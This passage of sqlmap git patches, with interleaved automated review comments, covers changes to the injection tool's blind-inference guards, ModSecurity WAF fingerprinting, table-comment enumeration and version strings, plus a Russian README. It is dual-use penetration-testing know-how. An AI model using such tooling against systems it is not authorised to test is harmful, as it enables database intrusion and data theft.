+++ b/lib/core/settings.py
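Review bot: `conf.direct = "%s?mode=SYSDBA" % conf.direct` appends a query string blindly, so a direct-connection string that already carries `?...` parameters ends up with two `?` separators, and nothing stops `mode=SYSDBA` being appended a second time if parseTargetDirect runs more than once in a session (whether it can is not visible here). A guard such as `if "mode=" not in conf.direct:` followed by `conf.direct += "%smode=SYSDBA" % ("&" if "?" in conf.direct else "?")` covers both cases. A one-line comment stating the reason, e.g. `# SYS may only connect AS SYSDBA/SYSOPER (ORA-28009), hence the forced mode`, would make the intent clearer than the bare reference URL. parseTargetDirect starts outside the hunk.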
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.5.9"
+VERSION = "1.2.5.10"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py
index 7dfc593096b..4315cf7d033 100644
--- a/lib/utils/sqlalchemy.py
+++ b/lib/utils/sqlalchemy.py
@@ -57,7 +57,7 @@ def connect(self):
             if self.dialect == "sqlite":
                 engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False})
             elif self.dialect == "oracle":
-                engine = _sqlalchemy.create_engine(conf.direct, connect_args={"allow_twophase": False})
+                engine = _sqlalchemy.create_engine(conf.direct)
             else:
                 engine = _sqlalchemy.create_engine(conf.direct, connect_args={})
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 94e15d08bec..681a53cdf6d 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
 b1990c7805943f0c973a853bba981d96 lib/core/agent.py
 fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py
-2e81c8be79eb98227affcfd7bd25c702 lib/core/common.py
+3418e7b81884c1908dca632c590495ab lib/core/common.py
 0d082da16c388b3445e656e0760fb582 lib/core/convert.py
 9f87391b6a3395f7f50830b391264f27 lib/core/data.py
 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
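Review bot: With `connect_args` gone, the `elif self.dialect == "oracle"` branch in lib/utils/sqlalchemy.py now builds the engine the same way as the `else` branch apart from the latter's explicit `connect_args={}`, so the branch is dead weight that invites someone to re-add the removed argument later. Either drop it so oracle falls through to `else`, or keep it with a short comment on why `allow_twophase` was removed, e.g. `# oracle: no connect_args, see #3068` with the actual reason filled in, since the diff itself does not show it. connect starts outside the hunk.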
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0134616235193faba40a094cf7a4ba09 lib/core/settings.py +28c2fa86e020a801bf0a92974113b0ef lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -113,7 +113,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py -236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py +571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py 7348ee704485651737ddbe3538271be9 lib/utils/xrange.py From d5627fdf1b00443d849587f2c23554c2c353544f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 May 2018 12:15:47 +0200 Subject: [PATCH 135/428] Fixes #3099 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/queries.xml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7f8161fcee0..08da8e3342e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.10" +VERSION = "1.2.5.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 681a53cdf6d..fe51dbdc131 100644 --- a/txt/checksum.md5 
+++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -28c2fa86e020a801bf0a92974113b0ef lib/core/settings.py +5685eacb5dd1a67c8e30b85b7ead70a9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -471,4 +471,4 @@ b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -186808373a45316a45ad5f6ca8d90ff3 xml/queries.xml +a5eecbca03800851635817e0ca832a92 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index cbd407d47da..642182b7a62 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -711,7 +711,7 @@ - + From 331ccc5549e6d1c47797a7ec30fa009b80178e7c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 May 2018 23:07:52 +0200 Subject: [PATCH 136/428] Fixes #3100 --- lib/core/settings.py | 2 +- lib/request/inject.py | 3 +++ lib/techniques/blind/inference.py | 5 ++++- txt/checksum.md5 | 6 +++--- 4 files changed, 11 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 08da8e3342e..57015d407fc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.11" +VERSION = "1.2.5.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/request/inject.py b/lib/request/inject.py
index cfe69a6ba50..89cfbd0d455 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -77,6 +77,9 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar
     value = _goDns(payload, expression)
+    if payload is None:
+        return None
+
     if value is not None:
         return value
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 2783231f503..e08c5b6c627 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -69,6 +69,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
     finalValue = None
     retrievedLength = 0
+    if payload is None:
+        return 0, None
+
     if charsetType is None and conf.charset:
         asciiTbl = sorted(set(ord(_) for _ in conf.charset))
     else:
@@ -187,7 +190,7 @@ def tryHint(idx):
         with hintlock:
             hintValue = kb.hintValue
-        if hintValue is not None and len(hintValue) >= idx:
+        if payload is not None and hintValue is not None and len(hintValue) >= idx:
             if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2):
                 posValue = hintValue[idx - 1]
             else:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index fe51dbdc131..b77d3e04ade 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-5685eacb5dd1a67c8e30b85b7ead70a9 lib/core/settings.py
+28b7ef08849aa6d4f652a9d1c58ca8f2 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 6306284edcccc185b2df085438572b0d lib/core/target.py
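Review bot: In lib/request/inject.py the new `if payload is None: return None` guard sits after `value = _goDns(payload, expression)`, so a missing payload still goes through _goDns before the function bails out; if the point is to skip all work when there is no payload, the guard belongs before that call (or _goDns needs its own None check, which is not visible here). In lib/techniques/blind/inference.py the matching early return in bisection sits before any request is made, which makes the extra `payload is not None and` added to tryHint redundant if tryHint is the helper nested inside bisection, as the hunk header suggests, since bisection has already returned `0, None` by then. A one-line comment on each guard saying which caller passes a None payload (the commit only cites #3100) would spare the next reader the archaeology. _goInference and bisection both start outside their hunks.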
@@ -74,7 +74,7 @@ dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -b188a11542a996276abbbc48913501c3 lib/request/inject.py +c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py @@ -88,7 +88,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py 2665fa7eedb19a1b10ffe949999b75f1 lib/takeover/web.py f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py -2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py +4a7f231e597f754e9fcd116d13ad1a4d lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py From 42b0edca6dcfaf852d6d303e3411c47efa4ba885 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 19 May 2018 12:35:39 +0200 Subject: [PATCH 137/428] Fixes #3109 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/modsecurity.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 57015d407fc..cecc8f3013b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.12" +VERSION = "1.2.5.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index b77d3e04ade..c97b8d47890 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-28b7ef08849aa6d4f652a9d1c58ca8f2 lib/core/settings.py
+d9c4c537aef395bbcf182a7f57bb510f lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -417,7 +417,7 @@ eb56ac34775cc3c5f721ec967d04b283 waf/generic.py
 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py
 898f53c12133da3e946301f4aa97d538 waf/knownsec.py
 81e6bf619c7bb73c4b62e2439e60e95a waf/kona.py
-4906ab7bea7f6715f5796933f1a89381 waf/modsecurity.py
+b17a154fe7959619eaafffa60e14199f waf/modsecurity.py
 d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py
 bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py
 cb2f1516867684042f580e02138463de waf/netscaler.py
diff --git a/waf/modsecurity.py b/waf/modsecurity.py
index d6d0ecbef81..6b13043ef10 100644
--- a/waf/modsecurity.py
+++ b/waf/modsecurity.py
@@ -18,7 +18,7 @@ def detect(get_page):
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retval = re.search(r"Mod_Security|NOYB", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
-        retval |= "This error was generated by Mod_Security" in (page or "")
+        retval |= any(_ in (page or "") for _ in ("This error was generated by Mod_Security", "One or more things in your request were suspicious", "rules of the mod_security module"))
         if retval:
             break
From d8196cf7e650b0553a82644a4de5af82621c6535 Mon Sep 17 00:00:00 2001
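Review bot: The new `retval |= any(_ in (page or "") for _ in (...))` line packs three marker strings and the `page or ""` fallback into one long generator and re-evaluates `page or ""` for every marker. Lifting the markers to a module-level tuple (a constructed name such as `MODSECURITY_MARKERS = (...)`) and binding `body = page or ""` first gives a readable `retval |= any(_ in body for _ in MODSECURITY_MARKERS)` that also fits the file's line width. Since `retval` is already set from the Server header on the previous line, `retval = retval or any(...)` would additionally skip scanning the page body when the header has already matched. detect's definition is on the hunk header, outside the hunk.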
From: Miroslav Stampar
Date: Mon, 21 May 2018 23:17:32 +0200
Subject: [PATCH 138/428] Fixes #3110
---
 lib/core/settings.py   | 2 +-
 lib/request/connect.py | 7 -------
 txt/checksum.md5       | 4 ++--
 3 files changed, 3 insertions(+), 10 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index cecc8f3013b..59a63252195 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.5.13"
+VERSION = "1.2.5.14"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 2d6e5dfd07b..6bdb5b69e46 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -644,13 +644,6 @@ class _(dict):
             elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
                 warnMsg = "connection was forcibly closed by the target URL"
             elif "timed out" in tbMsg:
-                if not conf.disablePrecon:
-                    singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
-                    conf.disablePrecon = True
-
-                if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
-                    kb.responseTimes.clear()
-
                 if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
                     singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests")
                     kb.droppingRequests = True
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index c97b8d47890..d1ecb54271a 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d9c4c537aef395bbcf182a7f57bb510f lib/core/settings.py +7b3e526a8b77e167e0572e1ec52e2d62 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -69,7 +69,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 596988f14408cde1a2d3b5c9f231873a lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -e9bbba4a133effeae86d146286f9116b lib/request/connect.py +0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 43d9ac2bd47304c05b520d4163b805b211774e16 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 May 2018 23:44:21 +0200 Subject: [PATCH 139/428] Patch related to the #3101 --- lib/core/settings.py | 2 +- plugins/generic/databases.py | 36 ++++++++++++++++++++++++++++++++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 39 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 59a63252195..24ef311de60 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.14" +VERSION = "1.2.5.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index b17ff722a63..6e9ec1e638e 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -290,6 +290,24 @@ def getTables(self, bruteForce=None): db = safeSQLIdentificatorNaming(db) table = safeSQLIdentificatorNaming(unArrayizeValue(table), True) + if conf.getComments: + _ = queries[Backend.getIdentifiedDbms()].table_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), unsafeSQLIdentificatorNaming(table.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table)) + + comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for table '%s' " % (comment, unsafeSQLIdentificatorNaming(table)) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get column comments" + singleTimeWarnMessage(warnMsg) + if db not in kb.data.cachedTables: kb.data.cachedTables[db] = [table] else: 
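Review bot: The warning text in the new block reads `warnMsg += "possible to get column comments"`, but this code fetches table comments (it reads `table_comment` and logs "retrieved comment '%s' for table '%s'"), so it should say `warnMsg += "possible to get table comments"`. The same eighteen lines are added again in this file's second hunk (`@@ -353,6 +371,24 @@`), differing only in the `inject.getValue` keyword arguments, which makes them a clear candidate for a private helper on the class taking db, table and the getValue kwargs; as written the message slip has to be fixed in both places. getTables starts outside the hunk.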
@@ -353,6 +371,24 @@ def getTables(self, bruteForce=None):
                     table = safeSQLIdentificatorNaming(table, True)
                     tables.append(table)
+                    if conf.getComments:
+                        _ = queries[Backend.getIdentifiedDbms()].table_comment
+                        if hasattr(_, "query"):
+                            if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
+                                query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), unsafeSQLIdentificatorNaming(table.upper()))
+                            else:
+                                query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table))
+
+                            comment = unArrayizeValue(inject.getValue(query, union=False, error=False))
+                            if not isNoneValue(comment):
+                                infoMsg = "retrieved comment '%s' for table '%s' " % (comment, unsafeSQLIdentificatorNaming(table))
+                                infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db)
+                                logger.info(infoMsg)
+                        else:
+                            warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
+                            warnMsg += "possible to get column comments"
+                            singleTimeWarnMessage(warnMsg)
+
                 if tables:
                     kb.data.cachedTables[db] = tables
                 else:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index d1ecb54271a..8d1d6f4214f 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-7b3e526a8b77e167e0572e1ec52e2d62 lib/core/settings.py
+61a242f506d7e3374230b2e904ea309b lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -204,7 +204,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py -79c6dbcb7e6ad5e993a44aa52fdc36ed plugins/generic/databases.py +156c227dbe765da3d0fd2976fbe18d8b plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py From d2d829abf5b2033c8db94a69cc1e8d3046de8826 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 May 2018 10:07:35 +0200 Subject: [PATCH 140/428] Patch related to the #3117 --- lib/core/settings.py | 2 +- lib/utils/versioncheck.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 24ef311de60..30f0d219219 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.15" +VERSION = "1.2.5.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index e9f413c6c8a..4cbecb0dc72 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py 
@@ -12,7 +12,7 @@
 if PYVERSION >= "3" or PYVERSION < "2.6":
     exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION)
-extensions = ("bz2", "gzip", "ssl", "sqlite3", "zlib")
+extensions = ("bz2", "gzip", "pyexpat", "ssl", "sqlite3", "zlib")
 try:
     for _ in extensions:
         __import__(_)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 8d1d6f4214f..9f3bf778ebe 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-61a242f506d7e3374230b2e904ea309b lib/core/settings.py
+428225201b9174a4c4432d9d2e528a91 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -115,7 +115,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py
 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py
 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py
 dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py
-3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py
+fad14adffa8b640a15b06db955031695 lib/utils/versioncheck.py
 7348ee704485651737ddbe3538271be9 lib/utils/xrange.py
 b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py
 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py
From 1ecc3267145fc1348f0652eda4d2ee5a9e654682 Mon Sep 17 00:00:00 2001
From: German Date: Thu, 24 May 2018 11:11:09 +0300 Subject: [PATCH 141/428] Russian localization readme (#3116) * add russian doc readme * add link head readme --- README.md | 1 + doc/translations/README-ru-RUS.md | 69 +++++++++++++++++++++++++++++++ 2 files changed, 70 insertions(+) create mode 100644 doc/translations/README-ru-RUS.md diff --git a/README.md b/README.md index b125d1561cc..5c4e2832526 100644 --- a/README.md +++ b/README.md @@ -54,6 +54,7 @@ Links Translations ---- +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) * [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) diff --git a/doc/translations/README-ru-RUS.md b/doc/translations/README-ru-RUS.md new file mode 100644 index 00000000000..281a4de32f6 --- /dev/null +++ b/doc/translations/README-ru-RUS.md 
@@ -0,0 +1,69 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение. + +**Проект sqlmap спонсируется [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).** + +Скриншоты +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Вы можете посетить [набор скриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонстрируемые некоторые функции в wiki. + +Установка +---- + +Вы можете скачать последнюю версию tarball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или последний zipball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/zipball/master). 
+ +Предпочтительно вы можете загрузить sqlmap, клонируя [Git](https://github.com/sqlmapproject/sqlmap) репозиторий: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работает из коробки с [Python](http://www.python.org/download/) версии **2.6.x** и **2.7.x** на любой платформе. + +Использование +---- + +Чтобы получить список основных опций и вариантов выбора, используйте: + + python sqlmap.py -h + +Чтобы получить список всех опций и вариантов выбора, используйте: + + python sqlmap.py -hh + +Вы можете найти пробный запуск [тут](https://asciinema.org/a/46601). +Чтобы получить обзор возможностей sqlmap, список поддерживаемых функций и описание всех параметров и переключателей, а также примеры, вам рекомендуется ознакомится с [пользовательским мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Ссылки +---- + +* Основной сайт: http://sqlmap.org +* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Отслеживание проблем: 